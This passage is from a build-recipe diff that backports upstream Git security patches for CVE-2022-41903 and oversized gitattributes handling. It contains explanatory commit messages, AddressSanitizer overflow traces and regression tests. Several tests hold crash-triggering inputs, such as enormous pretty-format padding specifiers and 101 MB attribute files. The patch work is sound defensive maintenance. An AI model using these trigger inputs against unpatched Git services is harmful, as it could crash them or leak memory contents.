+ return res;
+ }
+
+@@ -736,13 +756,18 @@ static struct attr_stack *read_attr_from_index(const struct index_state *istate,
+ struct attr_stack *res;
+ char *buf, *sp;
+ int lineno = 0;
++ size_t size;
+
+ if (!istate)
+ return NULL;
+
+- buf = read_blob_data_from_index(istate, path, NULL);
++ buf = read_blob_data_from_index(istate, path, &size);
+ if (!buf)
+ return NULL;
++ if (size >= ATTR_MAX_FILE_SIZE) {
++ warning(_("ignoring overly large gitattributes blob '%s'"), path);
++ return NULL;
++ }
+
+ res = xcalloc(1, sizeof(*res));
+ for (sp = buf; *sp; ) {
+@@ -1012,12 +1037,12 @@ static int macroexpand_one(struct all_attrs_item *all_attrs, int nr, int rem);
+ static int fill_one(const char *what, struct all_attrs_item *all_attrs,
+ const struct match_attr *a, int rem)
+ {
+- int i;
++ size_t i;
+
+- for (i = a->num_attr - 1; rem > 0 && i >= 0; i--) {
+- const struct git_attr *attr = a->state[i].attr;
++ for (i = a->num_attr; rem > 0 && i > 0; i--) {
++ const struct git_attr *attr = a->state[i - 1].attr;
+ const char **n = &(all_attrs[attr->attr_nr].value);
+- const char *v = a->state[i].setto;
++ const char *v = a->state[i - 1].setto;
+
+ if (*n == ATTR__UNKNOWN) {
+ debug_set(what,
+@@ -1036,11 +1061,11 @@ static int fill(const char *path, int pathlen, int basename_offset,
+ struct all_attrs_item *all_attrs, int rem)
+ {
+ for (; rem > 0 && stack; stack = stack->prev) {
+- int i;
++ unsigned i;
+ const char *base = stack->origin ? stack->origin : "";
+
+- for (i = stack->num_matches - 1; 0 < rem && 0 <= i; i--) {
+- const struct match_attr *a = stack->attrs[i];
++ for (i = stack->num_matches; 0 < rem && 0 < i; i--) {
++ const struct match_attr *a = stack->attrs[i - 1];
+ if (a->is_macro)
+ continue;
+ if (path_matches(path, pathlen, basename_offset,
+@@ -1071,11 +1096,11 @@ static void determine_macros(struct all_attrs_item *all_attrs,
+ const struct attr_stack *stack)
+ {
+ for (; stack; stack = stack->prev) {
+- int i;
+- for (i = stack->num_matches - 1; i >= 0; i--) {
+- const struct match_attr *ma = stack->attrs[i];
++ unsigned i;
++ for (i = stack->num_matches; i > 0; i--) {
++ const struct match_attr *ma = stack->attrs[i - 1];
+ if (ma->is_macro) {
+- int n = ma->u.attr->attr_nr;
++ unsigned int n = ma->u.attr->attr_nr;
+ if (!all_attrs[n].macro) {
+ all_attrs[n].macro = ma;
+ }
+@@ -1127,7 +1152,7 @@ void git_check_attr(const struct index_state *istate,
+ collect_some_attrs(istate, path, check);
+
+ for (i = 0; i < check->nr; i++) {
+- size_t n = check->items[i].attr->attr_nr;
++ unsigned int n = check->items[i].attr->attr_nr;
+ const char *value = check->all_attrs[n].value;
+ if (value == ATTR__UNKNOWN)
+ value = ATTR__UNSET;
+diff --git a/attr.h b/attr.h
+index b0378bf..f424285 100644
+--- a/attr.h
++++ b/attr.h
+@@ -1,6 +1,18 @@
+ #ifndef ATTR_H
+ #define ATTR_H
+
++/**
++ * The maximum line length for a gitattributes file. If the line exceeds this
++ * length we will ignore it.
++ */
++#define ATTR_MAX_LINE_LENGTH 2048
++
++ /**
++ * The maximum size of the giattributes file. If the file exceeds this size we
++ * will ignore it.
++ */
++#define ATTR_MAX_FILE_SIZE (100 * 1024 * 1024)
++
+ struct index_state;
+
+ /* An attribute is a pointer to this opaque structure */
+diff --git a/t/t0003-attributes.sh b/t/t0003-attributes.sh
+index 71e63d8..556245b 100755
+--- a/t/t0003-attributes.sh
++++ b/t/t0003-attributes.sh
+@@ -342,4 +342,63 @@ test_expect_success 'query binary macro directly' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'large attributes line ignored in tree' '
++ test_when_finished "rm .gitattributes" &&
++ printf "path %02043d" 1 >.gitattributes &&
++ git check-attr --all path >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in tree' '
++ test_when_finished "rm .gitattributes" &&
++ # older versions of Git broke lines at 2048 bytes; the 2045 bytes
++ # of 0-padding here is accounting for the three bytes of "a 1", which
++ # would knock "trailing" to the "next" line, where it would be
++ # erroneously parsed.
++ printf "a %02045dtrailing attribute\n" 1 >.gitattributes &&
++ git check-attr --all trailing >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in tree' '
++ test_when_finished "rm .gitattributes" &&
++ dd if=/dev/zero of=.gitattributes bs=101M count=1 2>/dev/null &&
++ git check-attr --all path >/dev/null 2>err &&
++ echo "warning: ignoring overly large gitattributes file ${SQ}.gitattributes${SQ}" >expect &&
++ test_cmp expect err
++'
++
++test_expect_success 'large attributes line ignored in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(printf "path %02043d" 1 | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all path >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(printf "a %02045dtrailing attribute\n" 1 | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all trailing >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(dd if=/dev/zero bs=101M count=1 2>/dev/null | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all path >/dev/null 2>err &&
++ echo "warning: ignoring overly large gitattributes blob ${SQ}.gitattributes${SQ}" >expect &&
++ test_cmp expect err
++'
++
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
new file mode 100644
index 0000000000..87091abd47
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
@@ -0,0 +1,39 @@
+From a244dc5b0a629290881641467c7a545de7508ab2 Mon Sep 17 00:00:00 2001
+From: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Date: Tue, 2 Nov 2021 15:46:06 +0000
+Subject: [PATCH 01/12] test-lib: add prerequisite for 64-bit platforms
+
+Allow tests that assume a 64-bit `size_t` to be skipped in 32-bit
+platforms and regardless of the size of `long`.
+
+This imitates the `LONG_IS_64BIT` prerequisite.
+
+Signed-off-by: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/a244dc5b0a629290881641467c7a545de7508ab2]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/test-lib.sh | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/t/test-lib.sh b/t/test-lib.sh
+index e06fa02..db5ec2f 100644
+--- a/t/test-lib.sh
++++ b/t/test-lib.sh
+@@ -1613,6 +1613,10 @@ build_option () {
+ sed -ne "s/^$1: //p"
+ }
+
++test_lazy_prereq SIZE_T_IS_64BIT '
++ test 8 -eq "$(build_option sizeof-size_t)"
++'
++
+ test_lazy_prereq LONG_IS_64BIT '
+ test 8 -le "$(build_option sizeof-long)"
+ '
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
new file mode 100644
index 0000000000..f35e55b585
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
@@ -0,0 +1,187 @@
+From 81dc898df9b4b4035534a927f3234a3839b698bf Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:25 +0100
+Subject: [PATCH 02/12] pretty: fix out-of-bounds write caused by integer overflow
+
+When using a padding specifier in the pretty format passed to git-log(1)
+we need to calculate the string length in several places. These string
+lengths are stored in `int`s though, which means that these can easily
+overflow when the input lengths exceeds 2GB. This can ultimately lead to
+an out-of-bounds write when these are used in a call to memcpy(3P):
+
+ ==8340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1ec62f97fe at pc 0x7f2127e5f427 bp 0x7ffd3bd63de0 sp 0x7ffd3bd63588
+ WRITE of size 1 at 0x7f1ec62f97fe thread T0
+ #0 0x7f2127e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5628e96aa605 in format_and_pad_commit pretty.c:1762
+ #2 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+ #3 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+ #4 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+ #5 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+ #6 0x5628e95a44c8 in show_log log-tree.c:781
+ #7 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+ #8 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+ #10 0x5628e922f1a2 in cmd_log builtin/log.c:883
+ #11 0x5628e9106993 in run_builtin git.c:466
+ #12 0x5628e9107397 in handle_builtin git.c:721
+ #13 0x5628e9107b07 in run_argv git.c:788
+ #14 0x5628e91088a7 in cmd_main git.c:923
+ #15 0x5628e939d682 in main common-main.c:57
+ #16 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x7f1ec62f97fe is located 2 bytes to the left of 4831838265-byte region [0x7f1ec62f9800,0x7f1fe62f9839)
+ allocated by thread T0 here:
+ #0 0x7f2127ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5628e98774d4 in xrealloc wrapper.c:136
+ #2 0x5628e97cb01c in strbuf_grow strbuf.c:99
+ #3 0x5628e97ccd42 in strbuf_addchars strbuf.c:327
+ #4 0x5628e96aa55c in format_and_pad_commit pretty.c:1761
+ #5 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+ #6 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+ #7 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+ #8 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+ #9 0x5628e95a44c8 in show_log log-tree.c:781
+ #10 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+ #11 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+ #12 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+ #13 0x5628e922f1a2 in cmd_log builtin/log.c:883
+ #14 0x5628e9106993 in run_builtin git.c:466
+ #15 0x5628e9107397 in handle_builtin git.c:721
+ #16 0x5628e9107b07 in run_argv git.c:788
+ #17 0x5628e91088a7 in cmd_main git.c:923
+ #18 0x5628e939d682 in main common-main.c:57
+ #19 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #20 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #21 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0fe458c572a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ =>0x0fe458c572f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
+ 0x0fe458c57300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==8340==ABORTING
+
+The pretty format can also be used in `git archive` operations via the
+`export-subst` attribute. So this is what in our opinion makes this a
+critical issue in the context of Git forges which allow to download an
+archive of user supplied Git repositories.
+
+Fix this vulnerability by using `size_t` instead of `int` to track the
+string lengths. Add tests which detect this vulnerability when Git is
+compiled with the address sanitizer.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Original-patch-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Modified-by: Taylor Blau <me@ttalorr.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81dc898df9b4b4035534a927f3234a3839b698bf]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 11 ++++++-----
+ t/t4205-log-pretty-formats.sh | 17 +++++++++++++++++
+ 2 files changed, 23 insertions(+), 5 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index b32f036..637e344 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1427,7 +1427,9 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ struct format_commit_context *c)
+ {
+ struct strbuf local_sb = STRBUF_INIT;
+- int total_consumed = 0, len, padding = c->padding;
++ size_t total_consumed = 0;
++ int len, padding = c->padding;
++
+ if (padding < 0) {
+ const char *start = strrchr(sb->buf, '\n');
+ int occupied;
+@@ -1439,7 +1441,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ }
+ while (1) {
+ int modifier = *placeholder == 'C';
+- int consumed = format_commit_one(&local_sb, placeholder, c);
++ size_t consumed = format_commit_one(&local_sb, placeholder, c);
+ total_consumed += consumed;
+
+ if (!modifier)
+@@ -1505,7 +1507,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ }
+ strbuf_addbuf(sb, &local_sb);
+ } else {
+- int sb_len = sb->len, offset = 0;
++ size_t sb_len = sb->len, offset = 0;
+ if (c->flush_type == flush_left)
+ offset = padding - len;
+ else if (c->flush_type == flush_both)
+@@ -1528,8 +1530,7 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ const char *placeholder,
+ void *context)
+ {
+- int consumed;
+- size_t orig_len;
++ size_t consumed, orig_len;
+ enum {
+ NO_MAGIC,
+ ADD_LF_BEFORE_NON_EMPTY,
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index f42a69f..a2acee1 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,4 +788,21 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++ # We only assert that this command does not crash. This needs to be
++ # executed with the address sanitizer to demonstrate failure.
++ git log -1 --pretty="format:%>(2147483646)%x41%41%>(2147483646)%x41" >/dev/null
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'set up huge commit' '
++ test-tool genzeros 2147483649 | tr "\000" "1" >expect &&
++ huge_commit=$(git commit-tree -F expect HEAD^{tree})
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++ git log -1 --format="%B%<(1)%x30" $huge_commit >actual &&
++ echo 0 >>expect &&
++ test_cmp expect actual
++'
++
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
new file mode 100644
index 0000000000..d83d77eaf7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
@@ -0,0 +1,146 @@
+From b49f309aa16febeddb65e82526640a91bbba3be3 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:30 +0100
+Subject: [PATCH 03/12] pretty: fix out-of-bounds read when left-flushing with stealing
+
+With the `%>>(<N>)` pretty formatter, you can ask git-log(1) et al to
+steal spaces. To do so we need to look ahead of the next token to see
+whether there are spaces there. This loop takes into account ANSI
+sequences that end with an `m`, and if it finds any it will skip them
+until it finds the first space. While doing so it does not take into
+account the buffer's limits though and easily does an out-of-bounds
+read.
+
+Add a test that hits this behaviour. While we don't have an easy way to
+verify this, the test causes the following failure when run with
+`SANITIZE=address`:
+
+ ==37941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000baf at pc 0x55ba6f88e0d0 bp 0x7ffc84c50d20 sp 0x7ffc84c50d10
+ READ of size 1 at 0x603000000baf thread T0
+ #0 0x55ba6f88e0cf in format_and_pad_commit pretty.c:1712
+ #1 0x55ba6f88e7b4 in format_commit_item pretty.c:1801
+ #2 0x55ba6f9b1ae4 in strbuf_expand strbuf.c:429
+ #3 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+ #4 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+ #5 0x55ba6f7884c8 in show_log log-tree.c:781
+ #6 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+ #7 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+ #8 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+ #9 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+ #10 0x55ba6f2ea993 in run_builtin git.c:466
+ #11 0x55ba6f2eb397 in handle_builtin git.c:721
+ #12 0x55ba6f2ebb07 in run_argv git.c:788
+ #13 0x55ba6f2ec8a7 in cmd_main git.c:923
+ #14 0x55ba6f581682 in main common-main.c:57
+ #15 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #16 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #17 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000000baf is located 1 bytes to the left of 24-byte region [0x603000000bb0,0x603000000bc8)
+ allocated by thread T0 here:
+ #0 0x7f2d08ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x55ba6fa5b494 in xrealloc wrapper.c:136
+ #2 0x55ba6f9aefdc in strbuf_grow strbuf.c:99
+ #3 0x55ba6f9b0a06 in strbuf_add strbuf.c:298
+ #4 0x55ba6f9b1a25 in strbuf_expand strbuf.c:418
+ #5 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+ #6 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+ #7 0x55ba6f7884c8 in show_log log-tree.c:781
+ #8 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+ #9 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+ #11 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+ #12 0x55ba6f2ea993 in run_builtin git.c:466
+ #13 0x55ba6f2eb397 in handle_builtin git.c:721
+ #14 0x55ba6f2ebb07 in run_argv git.c:788
+ #15 0x55ba6f2ec8a7 in cmd_main git.c:923
+ #16 0x55ba6f581682 in main common-main.c:57
+ #17 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #18 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #19 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow pretty.c:1712 in format_and_pad_commit
+ Shadow bytes around the buggy address:
+ 0x0c067fff8120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ 0x0c067fff8130: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
+ 0x0c067fff8140: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff8150: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa fd fd
+ 0x0c067fff8160: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ =>0x0c067fff8170: fd fd fd fa fa[fa]00 00 00 fa fa fa 00 00 00 fa
+ 0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+
+Luckily enough, this would only cause us to copy the out-of-bounds data
+into the formatted commit in case we really had an ANSI sequence
+preceding our buffer. So this bug likely has no security consequences.
+
+Fix it regardless by not traversing past the buffer's start.
+
+Reported-by: Patrick Steinhardt <ps@pks.im>
+Reported-by: Eric Sesterhenn <eric.sesterhenn@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/b49f309aa16febeddb65e82526640a91bbba3be3]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 637e344..4348a82 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1468,7 +1468,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ if (*ch != 'm')
+ break;
+ p = ch - 1;
+- while (ch - p < 10 && *p != '\033')
++ while (p > sb->buf && ch - p < 10 && *p != '\033')
+ p--;
+ if (*p != '\033' ||
+ ch + 1 - p != display_mode_esc_sequence_len(p))
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index a2acee1..e69caba 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,6 +788,12 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with space stealing' '
++ printf mm0 >expect &&
++ git log -1 --pretty="format:mm%>>|(1)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
new file mode 100644
index 0000000000..9e3c74ff67
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
@@ -0,0 +1,150 @@
+From f6e0b9f38987ad5e47bab551f8760b70689a5905 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:34 +0100
+Subject: [PATCH 04/12] pretty: fix out-of-bounds read when parsing invalid padding format
+
+An out-of-bounds read can be triggered when parsing an incomplete
+padding format string passed via `--pretty=format` or in Git archives
+when files are marked with the `export-subst` gitattribute.
+
+This bug exists since we have introduced support for truncating output
+via the `trunc` keyword a7f01c6 (pretty: support truncating in %>, %<
+and %><, 2013-04-19). Before this commit, we used to find the end of the
+formatting string by using strchr(3P). This function returns a `NULL`
+pointer in case the character in question wasn't found. The subsequent
+check whether any character was found thus simply checked the returned
+pointer. After the commit we switched to strcspn(3P) though, which only
+returns the offset to the first found character or to the trailing NUL
+byte. As the end pointer is now computed by adding the offset to the
+start pointer it won't be `NULL` anymore, and as a consequence the check
+doesn't do anything anymore.
+
+The out-of-bounds data that is being read can in fact end up in the
+formatted string. As a consequence, it is possible to leak memory
+contents either by calling git-log(1) or via git-archive(1) when any of
+the archived files is marked with the `export-subst` gitattribute.
+
+ ==10888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000398 at pc 0x7f0356047cb2 bp 0x7fff3ffb95d0 sp 0x7fff3ffb8d78
+ READ of size 1 at 0x602000000398 thread T0
+ #0 0x7f0356047cb1 in __interceptor_strchrnul /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725
+ #1 0x563b7cec9a43 in strbuf_expand strbuf.c:417
+ #2 0x563b7cda7060 in repo_format_commit_message pretty.c:1869
+ #3 0x563b7cda8d0f in pretty_print_commit pretty.c:2161
+ #4 0x563b7cca04c8 in show_log log-tree.c:781
+ #5 0x563b7cca36ba in log_tree_commit log-tree.c:1117
+ #6 0x563b7c927ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #7 0x563b7c92835b in cmd_log_walk builtin/log.c:549
+ #8 0x563b7c92b1a2 in cmd_log builtin/log.c:883
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x602000000398 is located 0 bytes to the right of 8-byte region [0x602000000390,0x602000000398)
+ allocated by thread T0 here:
+ #0 0x7f0356072faa in __interceptor_strdup /usr/src/debug/gcc/libsanitizer/asan/asan_interceptors.cpp:439
+ #1 0x563b7cf7317c in xstrdup wrapper.c:39
+ #2 0x563b7cd9a06a in save_user_format pretty.c:40
+ #3 0x563b7cd9b3e5 in get_commit_format pretty.c:173
+ #4 0x563b7ce54ea0 in handle_revision_opt revision.c:2456
+ #5 0x563b7ce597c9 in setup_revisions revision.c:2850
+ #6 0x563b7c9269e0 in cmd_log_init_finish builtin/log.c:269
+ #7 0x563b7c927362 in cmd_log_init builtin/log.c:348
+ #8 0x563b7c92b193 in cmd_log builtin/log.c:882
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725 in __interceptor_strchrnul
+ Shadow bytes around the buggy address:
+ 0x0c047fff8020: fa fa fd fd fa fa 00 06 fa fa 05 fa fa fa fd fd
+ 0x0c047fff8030: fa fa 00 02 fa fa 06 fa fa fa 05 fa fa fa fd fd
+ 0x0c047fff8040: fa fa 00 07 fa fa 03 fa fa fa fd fd fa fa 00 00
+ 0x0c047fff8050: fa fa 00 01 fa fa fd fd fa fa 00 00 fa fa 00 01
+ 0x0c047fff8060: fa fa 00 06 fa fa 00 06 fa fa 05 fa fa fa 05 fa
+ =>0x0c047fff8070: fa fa 00[fa]fa fa fd fa fa fa fd fd fa fa fd fd
+ 0x0c047fff8080: fa fa fd fd fa fa 00 00 fa fa 00 fa fa fa fd fa
+ 0x0c047fff8090: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
